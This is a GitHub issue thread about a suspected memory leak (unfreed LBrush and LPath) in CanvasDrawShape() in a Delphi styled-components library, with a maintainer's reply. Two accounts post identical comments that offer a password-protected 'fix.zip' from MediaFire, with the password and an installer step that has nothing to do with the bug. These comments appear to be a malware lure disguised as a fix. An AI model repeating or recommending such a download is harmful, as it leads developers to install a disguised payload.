### ISSUE TITLE
Memory leak in Vcl.ButtonStylesAttributes.pas -> CanvasDrawShape()

### ISSUE THREAD

**Issue by pjrobin** [EtheaDev/StyledComponents#36]
My memory leak tool (madExcept) says there is an issue in CanvasDrawShape(): LBrush and LPath seem not be freed.

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by carloBarazzetta** [comment]
Sorry for this problem, but the ReportMemoryLeaksOnShutdown := True; don't report any problem... madexcept is more accurate...
